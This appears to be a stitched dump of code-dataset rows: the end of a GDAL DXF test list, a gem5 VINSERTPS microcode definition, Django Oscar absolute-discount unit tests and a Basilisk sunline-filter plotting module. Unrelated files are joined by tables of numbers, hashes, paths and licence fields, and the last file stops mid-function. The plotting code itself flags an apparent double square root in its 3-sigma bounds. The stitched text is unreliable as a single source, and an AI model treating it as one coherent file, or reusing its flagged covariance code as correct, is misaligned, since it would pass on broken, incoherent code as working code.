    ogr_dxf_48,
    ogr_dxf_49,
    ogr_dxf_50,
    ogr_dxf_51,
    ogr_dxf_52,
    ogr_dxf_53,
    ogr_dxf_cleanup ]
if __name__ == '__main__':
    # Standalone entry point: register the suite name, run every test in
    # gdaltest_list and print the pass/fail summary.
    gdaltest.setup_run( 'ogr_dxf' )
    gdaltest.run_tests( gdaltest_list )
    gdaltest.summarize()
| 108.569123
| 3,873
| 0.773955
| 52,660
| 417,014
| 6.102754
| 0.115325
| 0.003834
| 0.002296
| 0.0205
| 0.85214
| 0.840241
| 0.828684
| 0.816536
| 0.806787
| 0.788575
| 0
| 0.676469
| 0.096846
| 417,014
| 3,840
| 3,874
| 108.597396
| 0.176814
| 0.333483
| 0
| 0.625211
| 0
| 0.080523
| 0.733671
| 0.368972
| 0
| 0
| 0
| 0.00026
| 0
| 1
| 0.022766
| false
| 0
| 0.002951
| 0
| 0.214587
| 0.013491
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
16a7de5bc41f871a82ae5b4377e5babb494b55c8
| 1,105
|
py
|
Python
|
src/arch/x86/isa/insts/simd512/floating_point/data_transfer/vinsertps.py
|
jyhuang91/gem5-avx
|
f988da46080f8db49beb39e20af437219f3aa4cb
|
[
"BSD-3-Clause"
] | 2
|
2021-01-15T17:32:18.000Z
|
2021-12-21T02:53:58.000Z
|
src/arch/x86/isa/insts/simd512/floating_point/data_transfer/vinsertps.py
|
jyhuang91/gem5-avx
|
f988da46080f8db49beb39e20af437219f3aa4cb
|
[
"BSD-3-Clause"
] | 3
|
2021-03-26T20:33:59.000Z
|
2022-01-24T22:54:03.000Z
|
src/arch/x86/isa/insts/simd512/floating_point/data_transfer/vinsertps.py
|
jyhuang91/gem5-avx
|
f988da46080f8db49beb39e20af437219f3aa4cb
|
[
"BSD-3-Clause"
] | 3
|
2021-03-27T16:36:19.000Z
|
2022-03-28T18:32:57.000Z
|
# VINSERTPS macroop definitions for gem5's x86 microcode assembler, one per
# addressing form: register source (XMM_XMM_I), memory source (XMM_M_I) and
# RIP-relative memory source (XMM_P_I).  Each form copies the destination
# vector halves, runs the low/high insert micro-ops, then zeroes the upper
# vector lanes via vclear.
# NOTE(review): the register form masks the immediate with 0xFF while the
# memory forms use 0x3F — presumably because the immediate's source-select
# bits are ignored for a memory operand; confirm against the VINSERTPS
# instruction reference.
microcode = '''
def macroop VINSERTPS_XMM_XMM_I {
movfp ufp1, xmm0m, dataSize=8
movfp ufp2, xmm1m, dataSize=8
movfp xmm0, xmm0v, dataSize=8
movfp xmm1, xmm1v, dataSize=8
minsertpsl dest=xmm0, src1=ufp1, op2=ufp2, size=4, ext="(IMMEDIATE & 0xFF)"
minsertpsh dest=xmm1, src1=ufp1, op2=ufp2, size=4, ext="(IMMEDIATE & 0xFF)"
vclear dest=xmm2, destVL=16
};
def macroop VINSERTPS_XMM_M_I {
movfp xmm0, xmm0v, dataSize=8
movfp xmm1, xmm1v, dataSize=8
ldfp ufp1, seg, sib, "DISPLACEMENT + 0", dataSize=4
minsertpsl dest=xmm0, src1=ufp1, op2=ufp1, size=4, ext="(IMMEDIATE & 0x3F)"
minsertpsh dest=xmm1, src1=ufp1, op2=ufp1, size=4, ext="(IMMEDIATE & 0x3F)"
vclear dest=xmm2, destVL=16
};
def macroop VINSERTPS_XMM_P_I {
movfp xmm0, xmm0v, dataSize=8
movfp xmm1, xmm1v, dataSize=8
rdip t7
ldfp ufp1, seg, riprel, "DISPLACEMENT + 0", dataSize=4
minsertpsl dest=xmm0, src1=ufp1, op2=ufp1, size=4, ext="(IMMEDIATE & 0x3F)"
minsertpsh dest=xmm1, src1=ufp1, op2=ufp1, size=4, ext="(IMMEDIATE & 0x3F)"
vclear dest=xmm2, destVL=16
};
'''
| 34.53125
| 79
| 0.676018
| 164
| 1,105
| 4.5
| 0.256098
| 0.097561
| 0.089431
| 0.138211
| 0.837398
| 0.837398
| 0.788618
| 0.788618
| 0.788618
| 0.601626
| 0
| 0.095982
| 0.18914
| 1,105
| 32
| 80
| 34.53125
| 0.727679
| 0
| 0
| 0.571429
| 0
| 0.214286
| 0.982821
| 0
| 0
| 0
| 0.0217
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
16c91381ebf5fc1d75342359773895e258ab56c3
| 16,010
|
py
|
Python
|
tests/integration/offer/test_absolute_benefit.py
|
iicc/django-oscar
|
67ebe6bc21c242e9b0750b9f306b2f46a2758199
|
[
"BSD-3-Clause"
] | 2
|
2019-01-19T22:41:18.000Z
|
2019-01-21T05:47:23.000Z
|
tests/integration/offer/test_absolute_benefit.py
|
iicc/django-oscar
|
67ebe6bc21c242e9b0750b9f306b2f46a2758199
|
[
"BSD-3-Clause"
] | 10
|
2020-05-11T20:33:31.000Z
|
2022-03-12T00:24:28.000Z
|
tests/integration/offer/test_absolute_benefit.py
|
iicc/django-oscar
|
67ebe6bc21c242e9b0750b9f306b2f46a2758199
|
[
"BSD-3-Clause"
] | 3
|
2019-03-20T16:17:58.000Z
|
2022-02-25T09:38:38.000Z
|
from decimal import Decimal as D
from unittest import mock
from django.core.exceptions import ValidationError
from django.test import TestCase
from oscar.apps.offer import models
from oscar.apps.offer.utils import Applicator
from oscar.test.basket import add_product, add_products
from oscar.test import factories
class TestAnAbsoluteDiscountAppliedWithCountConditionOnDifferentRange(TestCase):
    """Absolute discount whose benefit range differs from its condition range."""

    def _single_product_range(self):
        # Build a range containing exactly one freshly created product.
        product = factories.ProductFactory()
        product_range = factories.RangeFactory()
        product_range.add_product(product)
        return product, product_range

    def setUp(self):
        self.condition_product, cond_range = self._single_product_range()
        self.condition = models.CountCondition.objects.create(
            range=cond_range, type=models.Condition.COUNT, value=2)
        self.benefit_product, ben_range = self._single_product_range()
        self.benefit = models.AbsoluteDiscountBenefit.objects.create(
            range=ben_range, type=models.Benefit.FIXED, value=D('3.00'))
        self.offer = models.ConditionalOffer(
            id=1, condition=self.condition, benefit=self.benefit)
        self.basket = factories.create_basket(empty=True)
        self.applicator = Applicator()

    def _apply_offer(self, condition_qty, benefit_qty):
        # Fill the basket, apply the offer, and return the recorded discounts.
        add_product(self.basket, product=self.condition_product,
                    quantity=condition_qty)
        add_product(self.basket, product=self.benefit_product,
                    quantity=benefit_qty)
        self.applicator.apply_offers(self.basket, [self.offer])
        return self.basket.offer_applications.offer_discounts

    def test_succcessful_application_consumes_correctly(self):
        discounts = self._apply_offer(condition_qty=2, benefit_qty=1)
        self.assertEqual(1, len(discounts))
        self.assertEqual(1, discounts[0]['freq'])

    def test_condition_is_consumed_correctly(self):
        # Testing an error case reported on the mailing list
        discounts = self._apply_offer(condition_qty=3, benefit_qty=2)
        self.assertEqual(1, len(discounts))
        self.assertEqual(1, discounts[0]['freq'])
class TestAnAbsoluteDiscountAppliedWithCountCondition(TestCase):
    """Absolute (FIXED) discount gated by a count condition over all products."""

    def setUp(self):
        # Renamed from `range` to avoid shadowing the builtin range().
        product_range = models.Range.objects.create(
            name="All products", includes_all_products=True)
        self.condition = models.CountCondition.objects.create(
            range=product_range,
            type=models.Condition.COUNT,
            value=2)
        self.offer = mock.Mock()
        self.benefit = models.AbsoluteDiscountBenefit.objects.create(
            range=product_range,
            type=models.Benefit.FIXED,
            value=D('3.00'))
        self.basket = factories.create_basket(empty=True)

    def test_applies_correctly_to_empty_basket(self):
        # An empty basket cannot satisfy the condition: no discount at all.
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('0.00'), result.discount)
        self.assertEqual(0, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_basket_which_matches_condition_with_one_line(self):
        add_product(self.basket, price=D('12.00'), quantity=2)
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)
        # Check the discount is applied equally to each item in the line
        line = self.basket.all_lines()[0]
        prices = line.get_price_breakdown()
        self.assertEqual(1, len(prices))
        self.assertEqual(D('10.50'), prices[0][0])

    def test_applies_correctly_to_basket_which_matches_condition_with_multiple_lines(self):
        # Use a basket with 2 lines
        add_products(self.basket, [
            (D('12.00'), 1), (D('12.00'), 1)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertTrue(result.is_successful)
        self.assertFalse(result.is_final)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)
        # Check the discount is applied equally to each line
        for line in self.basket.all_lines():
            self.assertEqual(D('1.50'), line.discount_value)

    def test_applies_correctly_to_basket_which_matches_condition_with_multiple_lines_and_lower_total_value(self):
        # Use a basket with 2 lines whose total (2.50) is below the 3.00 benefit
        add_products(self.basket, [
            (D('1.00'), 1), (D('1.50'), 1)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertTrue(result.is_successful)
        self.assertFalse(result.is_final)
        self.assertEqual(D('2.50'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_basket_which_exceeds_condition(self):
        add_products(self.basket, [
            (D('12.00'), 2), (D('10.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(4, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_basket_which_exceeds_condition_with_smaller_prices_than_discount(self):
        add_products(self.basket, [
            (D('2.00'), 2), (D('4.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(4, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_basket_exceeding_condition_smaller_prices_than_discount_higher_prices_first(self):
        # NOTE(review): identical fixture and assertions to the previous test;
        # presumably intended to use a different line ordering — verify.
        add_products(self.basket, [
            (D('2.00'), 2), (D('4.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(4, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscount(TestCase):
    """Rounding behaviour when an absolute discount is split across lines."""

    def setUp(self):
        # Renamed from `range` to avoid shadowing the builtin range().
        product_range = models.Range.objects.create(
            name="All products", includes_all_products=True)
        self.condition = models.CountCondition.objects.create(
            range=product_range,
            type=models.Condition.COUNT,
            value=2)
        self.benefit = models.AbsoluteDiscountBenefit.objects.create(
            range=product_range,
            type=models.Benefit.FIXED,
            value=D('4.00'))
        self.offer = mock.Mock()
        self.basket = factories.create_basket(empty=True)

    def test_applies_correctly_when_discounts_need_rounding(self):
        # Split discount across 3 lines
        for price in [D('2.00'), D('2.00'), D('2.00')]:
            add_product(self.basket, price)
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('4.00'), result.discount)
        # Check the discount is applied equally to each line, with the
        # rounding remainder landing on the final line (1.33/1.33/1.34).
        line_discounts = [line.discount_value for line in self.basket.all_lines()]
        self.assertEqual(len(line_discounts), 3)
        for i, v in enumerate([D('1.33'), D('1.33'), D('1.34')]):
            self.assertEqual(line_discounts[i], v)
class TestAnAbsoluteDiscountWithMaxItemsSetAppliedWithCountCondition(TestCase):
    """Absolute discount capped at one affected item, with a count condition."""

    def setUp(self):
        # Renamed from `range` to avoid shadowing the builtin range().
        product_range = models.Range.objects.create(
            name="All products", includes_all_products=True)
        self.condition = models.CountCondition.objects.create(
            range=product_range,
            type=models.Condition.COUNT,
            value=2)
        self.benefit = models.AbsoluteDiscountBenefit.objects.create(
            range=product_range,
            type=models.Benefit.FIXED,
            value=D('3.00'),
            max_affected_items=1)
        self.offer = mock.Mock()
        self.basket = factories.create_basket(empty=True)

    def test_applies_correctly_to_empty_basket(self):
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('0.00'), result.discount)
        self.assertEqual(0, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_basket_which_matches_condition(self):
        add_product(self.basket, D('12.00'), 2)
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_basket_which_exceeds_condition(self):
        add_products(self.basket, [(D('12.00'), 2), (D('10.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(2, self.basket.num_items_without_discount)

    def test_applies_correctly_to_basket_which_exceeds_condition_but_with_smaller_prices_than_discount(self):
        # Only one item is affected, so the discount is capped at its price.
        add_products(self.basket, [(D('2.00'), 2), (D('1.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('1.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(2, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscountAppliedWithValueCondition(TestCase):
    """Absolute (FIXED) discount gated by a basket-value condition."""

    def setUp(self):
        # Renamed from `range` to avoid shadowing the builtin range().
        product_range = models.Range.objects.create(
            name="All products", includes_all_products=True)
        self.condition = models.ValueCondition.objects.create(
            range=product_range,
            type=models.Condition.VALUE,
            value=D('10.00'))
        self.benefit = models.AbsoluteDiscountBenefit.objects.create(
            range=product_range,
            type=models.Benefit.FIXED,
            value=D('3.00'))
        self.offer = mock.Mock()
        self.basket = factories.create_basket(empty=True)

    def test_applies_correctly_to_empty_basket(self):
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('0.00'), result.discount)
        self.assertEqual(0, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_single_item_basket_which_matches_condition(self):
        add_products(self.basket, [(D('10.00'), 1)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(1, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_matches_condition(self):
        add_products(self.basket, [(D('5.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_exceeds_condition(self):
        add_products(self.basket, [(D('4.00'), 3)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(3, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_exceeds_condition_but_matches_boundary(self):
        add_products(self.basket, [(D('5.00'), 3)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(3, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscountWithMaxItemsSetAppliedWithValueCondition(TestCase):
    """Absolute discount capped at one affected item, with a value condition."""

    def setUp(self):
        # Renamed from `range` to avoid shadowing the builtin range().
        product_range = models.Range.objects.create(
            name="All products", includes_all_products=True)
        self.condition = models.ValueCondition.objects.create(
            range=product_range,
            type=models.Condition.VALUE,
            value=D('10.00'))
        self.benefit = models.AbsoluteDiscountBenefit.objects.create(
            range=product_range,
            type=models.Benefit.FIXED,
            value=D('3.00'),
            max_affected_items=1)
        self.offer = mock.Mock()
        self.basket = factories.create_basket(empty=True)

    def test_applies_correctly_to_empty_basket(self):
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('0.00'), result.discount)
        self.assertEqual(0, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_single_item_basket_which_matches_condition(self):
        add_products(self.basket, [(D('10.00'), 1)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(1, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_matches_condition(self):
        add_products(self.basket, [(D('5.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_exceeds_condition(self):
        add_products(self.basket, [(D('4.00'), 3)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(3, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_exceeds_condition_but_matches_boundary(self):
        add_products(self.basket, [(D('5.00'), 3)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(1, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_matches_condition_but_with_lower_prices_than_discount(self):
        # Item price (2.00) is below the 3.00 benefit, so the discount caps there.
        add_products(self.basket, [(D('2.00'), 6)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('2.00'), result.discount)
        self.assertEqual(5, self.basket.num_items_with_discount)
        self.assertEqual(1, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscountBenefit(TestCase):
    """Model-level validation rules for the absolute (FIXED) benefit."""

    def test_requires_a_benefit_value(self):
        # A FIXED benefit without a value must fail clean().
        all_products = models.Range.objects.create(
            name="", includes_all_products=True)
        benefit = models.Benefit(type=models.Benefit.FIXED, range=all_products)
        with self.assertRaises(ValidationError):
            benefit.clean()

    def test_requires_a_range(self):
        # A FIXED benefit without a range must fail clean().
        with self.assertRaises(ValidationError):
            models.Benefit(type=models.Benefit.FIXED, value=10).clean()
| 45.742857
| 118
| 0.693754
| 2,019
| 16,010
| 5.283309
| 0.074294
| 0.096559
| 0.094872
| 0.074248
| 0.84663
| 0.832099
| 0.820287
| 0.797131
| 0.797131
| 0.764695
| 0
| 0.023315
| 0.193629
| 16,010
| 349
| 119
| 45.873926
| 0.802943
| 0.018551
| 0
| 0.733096
| 0
| 0
| 0.021458
| 0
| 0
| 0
| 0
| 0
| 0.291815
| 1
| 0.117438
| false
| 0
| 0.02847
| 0
| 0.170819
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16da287c5d4dc947f243b61dfb399873da9c8570
| 26,133
|
py
|
Python
|
src/tests/scenarios/SunLineKF_test_utilities.py
|
ian-cooke/basilisk_mag
|
a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14
|
[
"0BSD"
] | null | null | null |
src/tests/scenarios/SunLineKF_test_utilities.py
|
ian-cooke/basilisk_mag
|
a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14
|
[
"0BSD"
] | 1
|
2019-03-13T20:52:22.000Z
|
2019-03-13T20:52:22.000Z
|
src/tests/scenarios/SunLineKF_test_utilities.py
|
ian-cooke/basilisk_mag
|
a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14
|
[
"0BSD"
] | null | null | null |
''' '''
'''
ISC License
Copyright (c) 2016, Autonomous Vehicle Systems Lab, University of Colorado at Boulder
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
import sys, os, inspect
import numpy as np
from Basilisk.utilities import unitTestSupport
filename = inspect.getframeinfo(inspect.currentframe()).filename
path = os.path.dirname(os.path.abspath(__file__))
import matplotlib.pyplot as plt
def StateErrorCovarPlot(x, Pflat, FilterType, show_plots, saveFigures):
    """Plot filter state errors together with their 3-sigma covariance bounds.

    Supports 3-, 5- and 6-state sunline filters (LOS components plus rates).

    Args:
        x: state-error log; column 0 is time in ns, columns 1..n the states.
        Pflat: covariance log; column 0 is time, columns 1..n*n the row-major
            flattened covariance matrix at each step.
        FilterType: string suffix appended to the saved figure name.
        show_plots: if True, display the figure interactively.
        saveFigures: if True, save the figure through unitTestSupport.
    """
    # Number of states: each Pflat row holds [t, P_flat], so columns = n*n + 1.
    nstates = int(np.sqrt(len(Pflat[0, :]) - 1))
    numpts = len(Pflat[:, 0])
    P = np.zeros([numpts, nstates, nstates])
    t = np.zeros(numpts)
    for i in range(numpts):
        t[i] = x[i, 0] * 1E-9  # ns -> s
        # General slice: the original hard-coded 1:37 (the 6-state count) and
        # only worked for 3/5 states because numpy clamps over-long slices.
        P[i, :, :] = Pflat[i, 1:(nstates * nstates + 1)].reshape([nstates, nstates])
        # Store standard deviations on the diagonal for plotting.
        for j in range(len(P[0, 0, :])):
            P[i, j, j] = np.sqrt(P[i, j, j])
    # NOTE(review): the plots below take np.sqrt of the diagonal again, so the
    # envelope drawn is 3*P^(1/4). Kept as-is to preserve existing output, but
    # this looks like an unintended double square root -- confirm.
    if nstates == 6:
        plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
        plt.subplot(321)
        plt.plot(t, x[:, 1], "b", label='Error Filter')
        plt.plot(t, 3 * np.sqrt(P[:, 0, 0]), 'r--', label='Covar Filter')
        plt.plot(t, -3 * np.sqrt(P[:, 0, 0]), 'r--')
        plt.legend(loc='best')
        plt.ylabel(r'$d_x$(m)')
        plt.title('First LOS component')
        plt.grid()
        plt.subplot(322)
        plt.plot(t, x[:, 4], "b")
        plt.plot(t, 3 * np.sqrt(P[:, 3, 3]), 'r--')
        plt.plot(t, -3 * np.sqrt(P[:, 3, 3]), 'r--')
        plt.ylabel(r'$\dot{d}_x$(m)')
        plt.title('First rate component')
        plt.grid()
        plt.subplot(323)
        plt.plot(t, x[:, 2], "b")
        plt.plot(t, 3 * np.sqrt(P[:, 1, 1]), 'r--')
        plt.plot(t, -3 * np.sqrt(P[:, 1, 1]), 'r--')
        plt.ylabel(r'$d_y$(m)')
        plt.title('Second LOS component')
        plt.grid()
        plt.subplot(324)
        plt.plot(t, x[:, 5], "b")
        plt.plot(t, 3 * np.sqrt(P[:, 4, 4]), 'r--')
        plt.plot(t, -3 * np.sqrt(P[:, 4, 4]), 'r--')
        plt.ylabel(r'$\dot{d}_y$(m)')
        plt.title('Second rate component')
        plt.grid()
        plt.subplot(325)
        plt.plot(t, x[:, 3], "b")
        plt.plot(t, 3 * np.sqrt(P[:, 2, 2]), 'r--')
        plt.plot(t, -3 * np.sqrt(P[:, 2, 2]), 'r--')
        plt.ylabel(r'$d_z$(m)')
        plt.xlabel('t(s)')
        plt.title('Third LOS component')
        plt.grid()
        plt.subplot(326)
        plt.plot(t, x[:, 6], "b")
        plt.plot(t, 3 * np.sqrt(P[:, 5, 5]), 'r--')
        plt.plot(t, -3 * np.sqrt(P[:, 5, 5]), 'r--')
        plt.ylabel(r'$\dot{d}_z$(m)')
        plt.xlabel('t(s)')
        plt.title('Third rate component')
        plt.grid()
    if nstates == 3:
        plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
        plt.subplot(311)
        plt.plot(t, x[:, 1], "b", label='Error Filter')
        plt.plot(t, 3 * np.sqrt(P[:, 0, 0]), 'r--', label='Covar Filter')
        plt.plot(t, -3 * np.sqrt(P[:, 0, 0]), 'r--')
        plt.legend(loc='best')
        plt.ylabel(r'$d_x$(m)')
        plt.title('First LOS component')
        plt.grid()
        plt.subplot(312)
        plt.plot(t, x[:, 2], "b")
        plt.plot(t, 3 * np.sqrt(P[:, 1, 1]), 'r--')
        plt.plot(t, -3 * np.sqrt(P[:, 1, 1]), 'r--')
        plt.ylabel(r'$d_y$(m)')
        # Fixed typo: was 'Second LOST component'.
        plt.title('Second LOS component')
        plt.grid()
        plt.subplot(313)
        plt.plot(t, x[:, 3], "b")
        plt.plot(t, 3 * np.sqrt(P[:, 2, 2]), 'r--')
        plt.plot(t, -3 * np.sqrt(P[:, 2, 2]), 'r--')
        plt.ylabel(r'$d_z$(m)')
        plt.title('Third LOS component')
        plt.grid()
    if nstates == 5:
        plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
        plt.subplot(321)
        plt.plot(t, x[:, 1], "b", label='Error Filter')
        plt.plot(t, 3 * np.sqrt(P[:, 0, 0]), 'r--', label='Covar Filter')
        plt.plot(t, -3 * np.sqrt(P[:, 0, 0]), 'r--')
        plt.legend(loc='best')
        plt.ylabel(r'$d_x$(m)')
        plt.title('First LOS component')
        plt.grid()
        plt.subplot(323)
        plt.plot(t, x[:, 2], "b")
        plt.plot(t, 3 * np.sqrt(P[:, 1, 1]), 'r--')
        plt.plot(t, -3 * np.sqrt(P[:, 1, 1]), 'r--')
        plt.ylabel(r'$d_y$(m)')
        plt.title('Second LOS component')
        plt.grid()
        plt.subplot(324)
        # Fixed: originally plotted x[:, 3] (third LOS) against P[3, 3]; the
        # rate state for this subplot is column 4, matching StatesPlotCompare
        # and StatesVsExpected.
        plt.plot(t, x[:, 4], "b")
        plt.plot(t, 3 * np.sqrt(P[:, 3, 3]), 'r--')
        plt.plot(t, -3 * np.sqrt(P[:, 3, 3]), 'r--')
        plt.ylabel(r'$\omega_y$(m)')
        plt.title('Second rate component')
        plt.grid()
        plt.subplot(325)
        plt.plot(t, x[:, 3], "b")
        plt.plot(t, 3 * np.sqrt(P[:, 2, 2]), 'r--')
        plt.plot(t, -3 * np.sqrt(P[:, 2, 2]), 'r--')
        plt.ylabel(r'$d_z$(m)')
        plt.xlabel('t(s)')
        plt.title('Third LOS component')
        plt.grid()
        plt.subplot(326)
        plt.plot(t, x[:, 5], "b")
        plt.plot(t, 3 * np.sqrt(P[:, 4, 4]), 'r--')
        plt.plot(t, -3 * np.sqrt(P[:, 4, 4]), 'r--')
        plt.ylabel(r'$\omega_z$(m)')
        plt.xlabel('t(s)')
        plt.title('Third rate component')
        plt.grid()
    # Guarded on saveFigures for consistency with every other helper in this
    # module (the original saved unconditionally).
    if saveFigures:
        unitTestSupport.saveScenarioFigure('scenario_Filters_StatesPlot' + FilterType, plt, path)
    if show_plots:
        plt.show()
    plt.close('all')
def StatesPlotCompare(x, x2, Pflat, Pflat2, FilterType, show_plots, saveFigures):
    """Plot filter state errors and covariances against expected values.

    Only the first 30 samples of each log are plotted, overlaying the filter
    output (blue/red) with the expected output (green/cyan).

    Args:
        x: filter state-error log; column 0 is time in ns, columns 1..n states.
        x2: expected state-error log, same layout as x.
        Pflat: filter covariance log; column 0 is time, columns 1..n*n the
            row-major flattened covariance matrix.
        Pflat2: expected covariance log, same layout as Pflat.
        FilterType: string suffix appended to the saved figure name.
        show_plots: if True, display the figure interactively.
        saveFigures: NOTE(review): unused here -- the figure is saved
            unconditionally, unlike most helpers in this module; confirm intent.
    """
    # Number of states: each Pflat row holds [t, P_flat], so columns = n*n + 1.
    nstates = int(np.sqrt(len(Pflat[0, :]) - 1))
    P = np.zeros([len(Pflat[:, 0]), nstates, nstates])
    P2 = np.zeros([len(Pflat[:, 0]), nstates, nstates])
    t = np.zeros(len(Pflat[:, 0]))
    for i in range(len(Pflat[:, 0])):
        t[i] = x[i, 0] * 1E-9  # ns -> s
        P[i, :, :] = Pflat[i, 1:(nstates * nstates + 1)].reshape([nstates, nstates])
        P2[i, :, :] = Pflat2[i, 1:(nstates * nstates + 1)].reshape([nstates, nstates])
    if nstates == 6:
        # 6-state filter: three LOS components (cols 1-3) and three rates (cols 4-6).
        plt.figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
        plt.subplot(321)
        plt.plot(t[0:30], x[0:30, 1], "b", label='Error Filter')
        plt.plot(t[0:30], 3 * np.sqrt(P[0:30, 0, 0]), 'r--', label='Covar Filter')
